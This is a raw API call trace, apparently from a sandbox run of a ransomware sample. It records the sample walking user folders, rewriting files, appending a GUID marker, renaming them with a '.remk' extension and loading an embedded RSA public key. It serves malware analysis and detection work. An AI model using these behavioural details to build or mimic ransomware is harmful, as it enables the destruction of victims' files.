[0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.945] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.945] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.946] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0234.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.946] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7093, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.946] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0234.947] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.947] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.947] CloseHandle (hObject=0x640) returned 1 [0234.956] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\WOsa73cE3Ci.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\wosa73ce3ci.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\WOsa73cE3Ci.docx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\wosa73ce3ci.docx.remk")) returned 1 [0234.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0234.957] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.957] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.958] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0234.958] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x255d33f0, ftCreationTime.dwHighDateTime=0x1d5dc05, ftLastAccessTime.dwLowDateTime=0xe935b3b0, ftLastAccessTime.dwHighDateTime=0x1d5e3ee, ftLastWriteTime.dwLowDateTime=0xe935b3b0, ftLastWriteTime.dwHighDateTime=0x1d5e3ee, nFileSizeHigh=0x0, nFileSizeLow=0x4907, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_1Lysnpm8u.bmp", cAlternateFileName="_1LYSN~1.BMP")) returned 1 [0234.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\_1Lysnpm8u.bmp") returned=".bmp" [0234.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\_1Lysnpm8u.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\_1lysnpm8u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.959] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=18695) returned 1 [0234.959] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.962] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x48e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.962] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.964] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x4907, lpOverlapped=0x0) returned 1 [0234.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.965] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0234.967] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.967] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.967] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.967] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.967] GetLastError () returned 0x0 [0234.967] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.967] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0234.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0234.967] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.967] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.967] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.967] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0234.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9e8 | out: hHeap=0x630000) returned 1 [0234.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9e8 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee9a0 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee988 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.968] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0234.968] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9e8 | out: hHeap=0x630000) returned 1 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.969] GetCurrentThreadId () returned 0x314 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3d90 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694ec0 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.969] GetCurrentThreadId () returned 0x314 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0234.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.970] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.970] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x4907, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.970] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.971] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.971] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.971] CloseHandle (hObject=0x640) returned 1 [0234.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0234.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x325d3b0 [0234.983] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\_1Lysnpm8u.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\_1lysnpm8u.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\_1Lysnpm8u.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\_1lysnpm8u.bmp.remk")) returned 1 [0235.004] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x255d33f0, ftCreationTime.dwHighDateTime=0x1d5dc05, ftLastAccessTime.dwLowDateTime=0xe935b3b0, ftLastAccessTime.dwHighDateTime=0x1d5e3ee, ftLastWriteTime.dwLowDateTime=0xe935b3b0, ftLastWriteTime.dwHighDateTime=0x1d5e3ee, nFileSizeHigh=0x0, nFileSizeLow=0x4907, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_1Lysnpm8u.bmp", cAlternateFileName="_1LYSN~1.BMP")) returned 0 [0235.004] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0235.005] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0235.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694ec0 [0235.005] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0235.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0235.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0235.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba678 [0235.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0235.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0235.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c890 [0235.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0235.005] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.006] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.006] PathFindFileNameW (pszPath="") returned="" [0235.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0235.054] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0235.054] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0235.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0235.054] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned=".ico" [0235.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.055] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=29926) returned 1 [0235.056] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.058] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.059] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.073] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.073] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x74e6, lpOverlapped=0x0) returned 1 [0235.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.114] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.114] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695058) returned 1 [0235.115] CryptCreateHash (in: hProv=0x695058, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.115] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.115] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.115] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.116] GetLastError () returned 0x0 [0235.116] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.116] CryptReleaseContext (hProv=0x695058, dwFlags=0x0) returned 1 [0235.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.116] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.116] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.116] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.116] 